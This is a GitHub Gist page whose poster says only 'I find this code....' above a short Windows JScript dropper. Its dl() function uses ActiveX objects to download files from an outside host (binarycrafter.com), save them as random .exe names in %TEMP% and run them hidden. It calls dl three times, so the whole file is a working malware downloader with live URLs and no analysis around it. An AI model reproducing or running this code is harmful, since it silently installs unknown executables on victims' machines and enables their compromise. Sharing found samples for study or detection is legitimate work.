Created
November 27, 2014 02:32
-
-
Save jamlfy/66a3862438f7cad88c44 to your computer and use it in GitHub Desktop.
I find this code....
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function dl(fr,fn,rn) { | |
| var ws = new ActiveXObject("WScript.Shell"); | |
| var fn = ws.ExpandEnvironmentStrings("%TEMP%")+"\\"+fn; | |
| var xo = new ActiveXObject("MSXML2.XMLHTTP"); | |
| xo.onreadystatechange = function() { | |
| if (xo.readyState === 4) { | |
| var xa = new ActiveXObject("ADODB.Stream"); | |
| xa.open(); | |
| xa.type = 1; | |
| xa.write(xo.ResponseBody); | |
| xa.position = 0; | |
| xa.saveToFile(fn,2); | |
| xa.close(); | |
| }; | |
| }; | |
| xo.open("GET",fr,false); | |
| xo.send(); | |
| if (rn > 0) { | |
| try { | |
| ws.Run(fn,0,0); | |
| } catch (er) { | |
| }; | |
| }; | |
| }; | |
| dl("http://mbbdbl.binarycrafter.com/document.php?id=5456565E0305080801161D2403050801140C4A070B09&rnd=6956491","77633476.exe",1); | |
| dl("http://mbbdbl.binarycrafter.com/document.php?id=5456565E0305080801161D2403050801140C4A070B09&rnd=2102972","23711278.exe",1); | |
| dl("http://mbbdbl.binarycrafter.com/document.php?id=5456565E0305080801161D2403050801140C4A070B09&rnd=8640913","38799279.exe",1); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment